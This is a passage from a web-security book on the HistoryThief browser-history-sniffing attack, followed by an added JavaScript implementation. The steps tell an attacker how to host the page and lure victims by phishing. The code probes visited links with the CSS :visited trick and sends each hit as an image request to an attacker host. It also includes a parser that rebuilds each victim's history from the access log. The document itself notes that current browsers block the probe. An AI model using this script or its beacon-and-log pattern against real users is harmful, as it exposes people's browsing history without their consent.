Download the tool, HistoryThief.zip, available at www.isecpartners.com/tools.html, and host it on a web server under the attacker's control, such as www.cybervillains.com/historythief.html.
2. The attacker edits historythief.html and modifies the attackersite variable on line 62 to point to the web server under her control. When a victim views the page, every URL in the predefined list that the victim has already visited is reported back to the attacker's web server. The attacker can then read her web server logs to see the victim's IP address and the matched history URLs.
3. If the attacker wants, she can modify the predefined list of URLs contained in the web sites array. This is the list of URLs for which the victim's browser history will be checked.
4. The attacker then forces the victim to view the www.cybervillains.com/historythief.html URL through an attack such as a phishing e-mail or a browser vulnerability.
96 Hacking Exposed Web 2.0
5. Finally, the attacker views her web server logs and obtains the victim's browser history. As shown in Figure 4-5, the victim's browser first issues a request to the attacker's web server for /historythief?. This is followed by a request for each URL predefined in HistoryThief that the victim has already visited (in this case, HistoryThief shows that the victim has previously viewed www.
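The five steps above describe the whole flow: a hosted page checks a predefined list of URLs against the victim's browser history, beacons each hit to the attacker's server, and the attacker reads the hits out of her access log. The following is an added example that implements that flow; it is not HistoryThief's source code and not from the book. The variable names `attackersite` and `websites`, the beacon shape `/historythief?<url-encoded URL>`, the probe URLs, and the access-log lines are all assumptions made for the example. It also carries the caveat a practitioner needs today: the CSS `:visited` read-back the technique relies on has been blocked by Firefox, Chrome and other browsers since around 2010/2011, so the probe returns no hits on a modern browser.

```javascript
// Added example (not HistoryThief's own source): the history-sniffing flow
// above, end to end. Names below are assumptions: `attackersite`, `websites`,
// the beacon path "/historythief?<url>", and the sample access-log lines.

// Attacker-controlled values the attacker edits before hosting the page.
const attackersite = "http://www.cybervillains.com"; // assumed attacker host
const websites = [ // assumed probe list; the victim's history is checked for these
  "http://www.example-bank.com/login",
  "http://mail.example.com/",
  "http://www.example-shop.com/cart",
];

// Pure decision logic: which probe URLs does the predicate say are in history?
function sniffHistory(urls, isVisited) {
  return urls.filter((url) => isVisited(url));
}

// One beacon request per match, so each hit is its own access-log line:
// GET /historythief?<url-encoded visited URL>
function buildBeacons(base, matches) {
  return matches.map((url) => `${base}/historythief?${encodeURIComponent(url)}`);
}

// Browser-side predicate using the classic CSS :visited trick: give visited
// links a distinctive colour and read it back through getComputedStyle.
// Caveat: since roughly 2010/2011 Firefox, Chrome and other browsers report
// the :link colour for visited links, so this returns false for everything
// on a modern browser. That is the browser-side fix for this attack.
function makeCssVisitedProbe(doc, win) {
  const style = doc.createElement("style");
  style.textContent =
    "a.ht-probe:link{color:rgb(1,1,1)} a.ht-probe:visited{color:rgb(255,0,0)}";
  doc.head.appendChild(style);
  return function isVisited(url) {
    const a = doc.createElement("a");
    a.className = "ht-probe";
    a.href = url;
    a.textContent = url;
    doc.body.appendChild(a);
    const color = win.getComputedStyle(a).color;
    doc.body.removeChild(a);
    return color === "rgb(255, 0, 0)";
  };
}

// Exfiltration: one <img> request per beacon URL. The server's 404 does not
// matter; the request line lands in the attacker's access log regardless.
function fireBeacons(doc, beacons) {
  for (const beacon of beacons) {
    const img = doc.createElement("img");
    img.src = beacon;
    doc.body.appendChild(img);
  }
}

// Attacker side (step 5): recover victim IP -> visited URLs from access-log
// lines. Combined Log Format is assumed; lines that are not beacon hits
// (such as the fetch of historythief.html itself) are ignored.
function parseBeaconLog(lines) {
  const re = /^(\S+) \S+ \S+ \[[^\]]+\] "GET \/historythief\?(\S+) HTTP\//;
  const hits = {};
  for (const line of lines) {
    const m = re.exec(line);
    if (!m) continue;
    (hits[m[1]] = hits[m[1]] || []).push(decodeURIComponent(m[2]));
  }
  return hits;
}

// Constructed sample log (not real data) in the shape step 5 describes.
const sampleLog = [
  '203.0.113.7 - - [12/Mar/2007:10:15:01 -0800] "GET /historythief.html HTTP/1.1" 200 2048',
  '203.0.113.7 - - [12/Mar/2007:10:15:02 -0800] "GET /historythief?http%3A%2F%2Fwww.example-bank.com%2Flogin HTTP/1.1" 404 210',
  '203.0.113.7 - - [12/Mar/2007:10:15:02 -0800] "GET /historythief?http%3A%2F%2Fmail.example.com%2F HTTP/1.1" 404 210',
  '198.51.100.4 - - [12/Mar/2007:11:02:40 -0800] "GET /historythief.html HTTP/1.1" 200 2048',
];

if (typeof document !== "undefined") {
  // In a browser: the real probe, as the hosted page would run it.
  const matches = sniffHistory(websites, makeCssVisitedProbe(document, window));
  fireBeacons(document, buildBeacons(attackersite, matches));
} else {
  // Offline (Node): stand in for the browser with a constructed history set,
  // then show what the attacker gets back from the logs.
  const constructedHistory = new Set(["http://www.example-bank.com/login", "http://mail.example.com/"]);
  const matches = sniffHistory(websites, (url) => constructedHistory.has(url));
  console.log("beacons:", buildBeacons(attackersite, matches));
  console.log("log hits:", parseBeaconLog(sampleLog));
}
```

Run it in a browser to exercise the real `:visited` probe (expect no hits on anything current), or under Node to see the beacon URLs and the per-IP history the attacker reconstructs from the log. The decision logic is kept separate from the DOM so the same code serves both sides of the attack and can be tested without a browser.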